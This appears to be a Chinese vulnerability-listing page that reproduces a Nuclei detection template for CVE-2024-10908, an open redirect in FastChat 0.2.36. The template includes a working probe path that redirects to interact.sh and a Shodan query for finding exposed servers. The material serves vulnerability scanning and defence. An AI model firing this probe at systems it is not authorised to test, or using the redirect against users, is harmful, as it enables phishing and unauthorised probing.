CVE-2024-10908: FastChat - Open Redirect

日期: 2025-08-01 | 影响软件: FastChat | POC: 已公开

漏洞描述

Detects an open redirect vulnerability in lm-sys/fastchat version 0.2.36, which allows attackers to redirect users to malicious URLs.

PoC代码[已公开]

id: CVE-2024-10908

info:
  name: FastChat - Open Redirect
  author: DhiyaneshDK
  severity: medium
  description: |
    Detects an open redirect vulnerability in lm-sys/fastchat version 0.2.36, which allows attackers to redirect users to malicious URLs.
  reference:
    - https://huntr.com/bounties/61f5e725-5579-4d08-8a88-e4ba04e6d1f2
  classification:
    epss-score: 0.00306
    epss-percentile: 0.53365
  metadata:
    shodan-query: html:"Chatbot Arena"
    verified: true
    max-request: 1
  tags: cve,cve2024,fastchat,redirect,oss,chatbot,areana

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: dsl
        dsl:
          - 'contains_any(body,"lm-sys/FastChat/")'
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/file=https://interact.sh"

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
# digest: 4a0a004730450220400540ee3babe892f13db13e6f1433bfe4321436ea3c28dc63bebb6040d0ebcf022100de914bf6539afeb2b19f89a698da808a83870874f9640db22d722496070b5403:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-10908.yaml